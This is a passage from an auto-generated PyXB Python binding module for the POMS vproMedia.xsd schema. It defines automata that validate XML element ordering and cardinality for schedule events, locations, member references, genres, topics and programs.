states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'primaryLifestyle')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 744, 6))
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(scheduleEventType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'secondaryLifestyle')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 745, 6))
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_6, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_7, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
]))
transitions.append(fac.Transition(st_12, [
]))
transitions.append(fac.Transition(st_13, [
]))
st_10._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_8, True) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_8, False) ]))
st_11._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_9, True) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_9, False) ]))
st_12._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_10, True) ]))
st_13._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
scheduleEventType._Automaton = _BuildAutomaton_17()
locationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'programUrl'), pyxb.binding.datatypes.anyURI, scope=locationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 811, 6)))
locationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'avAttributes'), avAttributesType, scope=locationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 812, 6)))
locationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'subtitles'), pyxb.binding.datatypes.string, scope=locationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 813, 6)))
locationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'offset'), pyxb.binding.datatypes.duration, scope=locationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 814, 6)))
locationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'duration'), pyxb.binding.datatypes.duration, scope=locationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 815, 6)))
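# locationType: a required programUrl followed by optional avAttributes,
# subtitles, offset and duration elements (each 0..1, in this order).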
def _BuildAutomaton_18 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_18
del _BuildAutomaton_18
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 812, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 813, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 814, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 815, 6))
counters.add(cc_3)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(locationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'programUrl')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 811, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(locationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'avAttributes')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 812, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(locationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'subtitles')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 813, 6))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(locationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'offset')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 814, 6))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(locationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'duration')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 815, 6))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
locationType._Automaton = _BuildAutomaton_18()
memberRefType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), recursiveMemberRef, scope=memberRefType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 861, 6)))
memberRefType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), recursiveMemberRef, scope=memberRefType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 862, 6)))
memberRefType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), recursiveMemberRef, scope=memberRefType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 863, 6)))
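# memberRefType: zero or more episodeOf, then zero or more memberOf, then an
# optional segmentOf; all content is optional (the automaton is nullable).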
def _BuildAutomaton_19 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_19
del _BuildAutomaton_19
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 861, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 862, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 863, 6))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(memberRefType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'episodeOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 861, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(memberRefType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 862, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(memberRefType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'segmentOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 863, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
memberRefType._Automaton = _BuildAutomaton_19()
recursiveMemberRef._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'memberOf'), recursiveMemberRef, scope=recursiveMemberRef, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 899, 6)))
recursiveMemberRef._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), recursiveMemberRef, scope=recursiveMemberRef, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 900, 6)))
recursiveMemberRef._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segmentOf'), recursiveMemberRef, scope=recursiveMemberRef, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 901, 6)))
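# recursiveMemberRef: zero or more memberOf, then zero or more episodeOf,
# then an optional segmentOf. Each child is itself a recursiveMemberRef (see
# the _AddElement calls above), so member/episode chains can nest arbitrarily.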
def _BuildAutomaton_20 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_20
del _BuildAutomaton_20
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 899, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 900, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 901, 6))
counters.add(cc_2)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(recursiveMemberRef._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'memberOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 899, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(recursiveMemberRef._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'episodeOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 900, 6))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(recursiveMemberRef._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'segmentOf')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 901, 6))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
st_2._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
recursiveMemberRef._Automaton = _BuildAutomaton_20()
genreType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'term'), termType, scope=genreType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 951, 6)))
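# genreType: zero or more term elements.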
def _BuildAutomaton_21 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_21
del _BuildAutomaton_21
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 951, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(genreType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'term')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 951, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
genreType._Automaton = _BuildAutomaton_21()
geoLocationsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'geoLocation'), geoLocationType, scope=geoLocationsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 974, 6)))
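# geoLocationsType: zero or more geoLocation elements.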
def _BuildAutomaton_22 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_22
del _BuildAutomaton_22
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 974, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(geoLocationsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'geoLocation')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 974, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
geoLocationsType._Automaton = _BuildAutomaton_22()
geoLocationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'name'), pyxb.binding.datatypes.string, scope=geoLocationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 981, 6)))
geoLocationType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), pyxb.binding.datatypes.string, scope=geoLocationType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 982, 6)))
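# geoLocationType: a required name element followed by zero or more scopeNote
# elements.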
def _BuildAutomaton_23 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_23
del _BuildAutomaton_23
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 982, 6))
counters.add(cc_0)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(geoLocationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'name')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 981, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(geoLocationType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scopeNote')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 982, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
geoLocationType._Automaton = _BuildAutomaton_23()
topicsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'topic'), topicType, scope=topicsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 991, 6)))
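# topicsType: zero or more topic elements.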
def _BuildAutomaton_24 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_24
del _BuildAutomaton_24
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 991, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(topicsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'topic')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 991, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
topicsType._Automaton = _BuildAutomaton_24()
topicType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'name'), pyxb.binding.datatypes.string, scope=topicType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 998, 6)))
topicType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scopeNote'), pyxb.binding.datatypes.string, scope=topicType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 999, 6)))
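# topicType: a required name element followed by zero or more scopeNote
# elements (same shape as geoLocationType above).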
def _BuildAutomaton_25 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_25
del _BuildAutomaton_25
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 999, 6))
counters.add(cc_0)
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(topicType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'name')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 998, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(topicType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'scopeNote')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 999, 6))
st_1 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
transitions = []
transitions.append(fac.Transition(st_1, [
]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, True) ]))
st_1._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
topicType._Automaton = _BuildAutomaton_25()
intentionType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'intention'), intentionEnum, scope=intentionType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1007, 6)))
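# intentionType: zero or more intention elements.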
def _BuildAutomaton_26 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_26
del _BuildAutomaton_26
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1007, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(intentionType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'intention')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1007, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
intentionType._Automaton = _BuildAutomaton_26()
targetGroupsType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'targetGroup'), targetGroupEnum, scope=targetGroupsType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1014, 6)))
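# targetGroupsType: zero or more targetGroup elements.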
def _BuildAutomaton_27 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_27
del _BuildAutomaton_27
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1014, 6))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(targetGroupsType._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'targetGroup')), pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 1014, 6))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
targetGroupsType._Automaton = _BuildAutomaton_27()
programType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'scheduleEvents'), scheduleEventsType, scope=programType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 91, 10)))
programType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'episodeOf'), memberRefType, scope=programType, documentation="\n A program (only if its type is 'BROADCAST') can be an episode of a group of type 'SERIES' or 'SEASON'.\n ", location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 92, 10)))
programType._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'segments'), segmentsType, scope=programType, location=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 99, 10)))
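# programType extends the inherited base media content model (crid,
# broadcaster, portal and the other baseMediaType children) with an optional
# scheduleEvents element (cc_33, 0..1), zero or more episodeOf references
# (cc_34, 0..unbounded) and an optional segments element (cc_35, 0..1).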
def _BuildAutomaton_28 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_28
del _BuildAutomaton_28
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 225, 6))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 245, 6))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 253, 6))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 261, 6))
counters.add(cc_3)
